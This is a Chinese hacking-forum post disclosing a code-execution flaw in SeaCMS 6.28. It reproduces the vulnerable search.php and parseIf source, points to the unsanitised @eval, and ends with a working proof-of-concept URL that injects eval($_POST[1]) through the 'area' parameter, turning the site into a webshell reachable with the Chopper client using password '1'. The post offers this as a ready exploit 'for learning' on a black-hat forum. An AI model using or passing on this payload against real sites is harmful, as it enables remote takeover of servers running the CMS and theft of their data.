黑帽联盟

 找回密码
 会员注册
查看: 2112|回复: 0
打印 上一主题 下一主题

[系统安全] 海洋CMS V6.28代码执行0day

[复制链接]

895

主题

38

听众

3329

积分

管理员

Rank: 9Rank: 9Rank: 9

  • TA的每日心情
    难过
    昨天 22:31
  • 签到天数: 1652 天

    [LV.Master]伴坛终老

    海洋CMS 版本 6.28 代码执行漏洞,很早之前挖的,网上已经被曝了,发出来当学习吧

    漏洞文件:seacms/search.php
    1. function echoSearchPage()
    2. {
    3.     global $dsql,$cfg_iscache,$mainClassObj,$page,$t1,$cfg_search_time,$searchtype,$searchword,$tid,$year,$letter,$area,$yuyan,$state,$ver,$order,$jq,$money,$cfg_basehost;
    4.     $order = !empty($order)?$order:time;
    5.     if(intval($searchtype)==5)
    6.     {
    7.         $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/cascade.html";
    8.         $typeStr = !empty($tid)?intval($tid).'_':'0_';
    9.         $yearStr = !empty($year)?PinYin($year).'_':'0_';
    10.         $letterStr = !empty($letter)?$letter.'_':'0_';
    11.         $areaStr = !empty($area)?PinYin($area).'_':'0_';
    12.         $orderStr = !empty($order)?$order.'_':'0_';
    13.         $jqStr = !empty($jq)?$jq.'_':'0_';
    14.         $cacheName="parse_cascade_".$typeStr.$yearStr.$letterStr.$areaStr.$orderStr;
    15.         $pSize = getPageSizeOnCache($searchTemplatePath,"cascade","");
    16.     }else
    17.     {
    18.         if($cfg_search_time&&$page==1) checkSearchTimes($cfg_search_time);
    19.         $searchTemplatePath = "/templets/".$GLOBALS['cfg_df_style']."/".$GLOBALS['cfg_df_html']."/search.html";
    20.         $cacheName="parse_search_";
    21.         $pSize = getPageSizeOnCache($searchTemplatePath,"search","");
    22.     }
    23.     if (empty($pSize)) $pSize=12;
    24.     switch (intval($searchtype)) {
    25.         case -1:
    26.             $whereStr=" where v_recycled=0 and (v_name like '%$searchword%' or v_actor like '%$searchword%' or v_director like '%$searchword%' or v_publisharea like '%$searchword%'  or v_publishyear like '%$searchword%' or v_letter='$searchword' or v_tags='$searchword' or v_nickname like '%$searchword%')";
    27.         break;
    28.         case 0:
    29.             $whereStr=" where v_recycled=0 and v_name like '%$searchword%'";   
    30.         break;
    31.         case 1:
    32.             $whereStr=" where v_recycled=0 and v_actor like '%$searchword%'";
    33.         break;
    34.         case 2:
    35.             $whereStr=" where v_recycled=0 and v_publisharea like '%$searchword%'";
    36.         break;
    37.         case 3:
    38.             $whereStr=" where v_recycled=0 and v_publishyear like '%$searchword%'";
    39.         break;
    40.         case 4:
    41.             $whereStr=" where v_recycled=0 and v_letter='".strtoupper($searchword)."'";
    42.         break;
    43.         case 5:
    44.             $whereStr=" where v_recycled=0";
    45.             if(!empty($tid)) $whereStr.=" and (tid in (".getTypeId($tid).") or FIND_IN_SET('".$tid."',v_extratype)<>0)";
    46.             if($year=="more")
    47.                 {
    48.                 $publishyeartxt=sea_DATA."/admin/publishyear.txt";
    49.                         $publishyear = array();
    50.                         if(filesize($publishyeartxt)>0)
    51.                         {
    52.                             $publishyear = file($publishyeartxt);
    53.                         }
    54.                         $yearArray=$publishyear;
    55.                         $yeartxt= implode(',',$yearArray);
    56.                         $whereStr.=" and v_publishyear not in ($yeartxt)";
    57.                 }
    58.             if(!empty($year) AND $year!="more")
    59.                 {$whereStr.=" and v_publishyear='$year'";}
    60.             if($letter=="0-9")
    61.                 {$whereStr.=" and v_letter in ('0','1','2','3','4','5','6','7','8','9')";}
    62.             if(!empty($letter) AND $letter!="0-9")
    63.                 {$whereStr.=" and v_letter='$letter'";}
    64.             if(!empty($area)) $whereStr.=" and v_publisharea='$area'";
    65.             if(!empty($yuyan)) $whereStr.=" and v_lang='$yuyan'";
    66.             if(!empty($jq)) $whereStr.=" and v_jq like'%$jq%'";
    67.             if($state=='l') $whereStr.=" and v_state !=0";
    68.             if($state=='w') $whereStr.=" and v_state=0";
    69.             if($money=='s') $whereStr.=" and v_money !=0";
    70.             if($money=='m') $whereStr.=" and v_money=0";
    71.             if(!empty($ver)) $whereStr.=" and v_ver='$ver'";
    72.         break;
    73.     }
    74.     $sql="select count(*) as dd from sea_data ".$whereStr;
    75.     $row = $dsql->GetOne($sql);
    76.     if(is_array($row))
    77.     {
    78.         $TotalResult = $row['dd'];
    79.     }
    80.     else
    81.     {
    82.         $TotalResult = 0;
    83.     }
    84.     $pCount = ceil($TotalResult/$pSize);
    85.     if($cfg_iscache){
    86.         if(chkFileCache($cacheName)){
    87.             $content = getFileCache($cacheName);
    88.         }else{
    89.             $content = parseSearchPart($searchTemplatePath);
    90.             setFileCache($cacheName,$content);
    91.         }
    92.     }else{
    93.             $content = parseSearchPart($searchTemplatePath);
    94.     }
    95.     $content = str_replace("{searchpage:page}",$page,$content);
    96.     $content = str_replace("{seacms:searchword}",$searchword,$content);
    97.     $content = str_replace("{seacms:searchnum}",$TotalResult,$content);
    98.     $content = str_replace("{searchpage:ordername}",$order,$content);
    99.    
    100.     $content = str_replace("{searchpage:order-hit-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hit&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    101.     $content = str_replace("{searchpage:order-hitasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=hitasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    102.    
    103.     $content = str_replace("{searchpage:order-id-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=id&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    104.     $content = str_replace("{searchpage:order-idasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=idasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    105.    
    106.     $content = str_replace("{searchpage:order-time-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=time&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    107.     $content = str_replace("{searchpage:order-timeasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=timeasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    108.    
    109.     $content = str_replace("{searchpage:order-commend-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commend&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    110.     $content = str_replace("{searchpage:order-commendasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=commendasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    111.    
    112.     $content = str_replace("{searchpage:order-score-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=score&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    113.     $content = str_replace("{searchpage:order-scoreasc-link}",$cfg_basehost."/search.php?page=".$page."&searchtype=5&order=scoreasc&tid=".$tid."&area=".$area."&year=".$year."&letter=".$letter."&yuyan=".$yuyan."&state=".$state."&money=".$money."&ver=".$ver."&jq=".$jq,$content);
    114.     if(intval($searchtype)==5)
    115.     {
    116.         $tname = !empty($tid)?getTypeNameOnCache($tid):'全部';
    117.         $jq = !empty($jq)?$jq:'全部';
    118.         $area = !empty($area)?$area:'全部';
    119.         $year = !empty($year)?$year:'全部';
    120.         $yuyan = !empty($yuyan)?$yuyan:'全部';
    121.         $letter = !empty($letter)?$letter:'全部';
    122.         $state = !empty($state)?$state:'全部';
    123.         $ver = !empty($ver)?$ver:'全部';
    124.         $money = !empty($money)?$money:'全部';
    125.         $content = str_replace("{searchpage:type}",$tid,$content);
    126.         $content = str_replace("{searchpage:typename}",$tname ,$content);
    127.         $content = str_replace("{searchpage:year}",$year,$content);
    128.         $content = str_replace("{searchpage:area}",$area,$content);
    129.         $content = str_replace("{searchpage:letter}",$letter,$content);
    130.         $content = str_replace("{searchpage:lang}",$yuyan,$content);
    131.         $content = str_replace("{searchpage:jq}",$jq,$content);
    132.         if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";}
    133.         if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";}
    134.         $content = str_replace("{searchpage:state}",$state2,$content);
    135.         $content = str_replace("{searchpage:money}",$money2,$content);
    136.         $content = str_replace("{searchpage:ver}",$ver,$content);
    137.         $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade");
    138.         $content=$mainClassObj->parseSearchItemList($content,"type");
    139.         $content=$mainClassObj->parseSearchItemList($content,"year");
    140.         $content=$mainClassObj->parseSearchItemList($content,"area");
    141.         $content=$mainClassObj->parseSearchItemList($content,"letter");
    142.         $content=$mainClassObj->parseSearchItemList($content,"lang");
    143.         $content=$mainClassObj->parseSearchItemList($content,"jq");
    144.         $content=$mainClassObj->parseSearchItemList($content,"state");
    145.         $content=$mainClassObj->parseSearchItemList($content,"ver");
    146.         $content=$mainClassObj->parseSearchItemList($content,"money");
    147.     }else
    148.     {
    149.         $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search");
    150.     }
    151.     $content=replaceCurrentTypeId($content,-444);
    152.     $content=$mainClassObj->parseIf($content);  //这个函数引起的,我们来跟踪下这个函数
    153.     $content=str_replace("{seacms:member}",front_member(),$content);
    154.     $searchPageStr = $content;
    155.     echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ;
    156. }
    复制代码
    parseif函数路径:/include/main.class.php
    1. function parseIf($content){
    2.         if (strpos($content,'{if:')=== false){
    3.         return $content;
    4.         }else{
    5.         $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");
    6.         $labelRule2="{elseif";
    7.         $labelRule3="{else}";
    8.         preg_match_all($labelRule,$content,$iar);
    9.         $arlen=count($iar[0]);
    10.         $elseIfFlag=false;
    11.         for($m=0;$m<$arlen;$m++){
    12.             $strIf=$iar[1][$m];
    13.             $strIf=$this->parseStrIf($strIf);
    14.             $strThen=$iar[2][$m];
    15.             $strThen=$this->parseSubIf($strThen);
    16.             if (strpos($strThen,$labelRule2)===false){
    17.                 if (strpos($strThen,$labelRule3)>=0){
    18.                     $elsearray=explode($labelRule3,$strThen);
    19.                     $strThen1=$elsearray[0];
    20.                     $strElse1=$elsearray[1];
    21.                     @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
    22.                     if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
    23.                 }else{
    24.                     @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");//就是这里了,@eval
    25.                 if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
    26.             }else{
    27.                 $elseIfArray=explode($labelRule2,$strThen);
    28.                 $elseIfArrayLen=count($elseIfArray);
    29.                 $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);
    30.                 $resultStr=$elseIfSubArray[1];
    31.                 $elseIfArraystr0=addslashes($elseIfArray[0]);
    32.                 @eval("if($strIf){\$resultStr=\"$elseIfArraystr0\";}");
    33.                 for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){
    34.                     $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");
    35.                     $strElseIf=$this->parseStrIf($strElseIf);
    36.                     $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));
    37.                     @eval("if(".$strElseIf."){\$resultStr=\"$strElseIfThen\";}");
    38.                     @eval("if(".$strElseIf."){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");
    39.                     if ($elseIfFlag) {break;}
    40.                 }
    41.                 $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");
    42.                 $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));
    43.                 if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0);
    44.                 @eval("if(".$strElseIf0."){\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;}");
    45.                 $content=str_replace($iar[0][$m],$resultStr,$content);
    46.             }
    47.         }
    48.         return $content;
    49.         }
    复制代码
    POC:/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1
    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    勿忘初心,方得始终!
    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部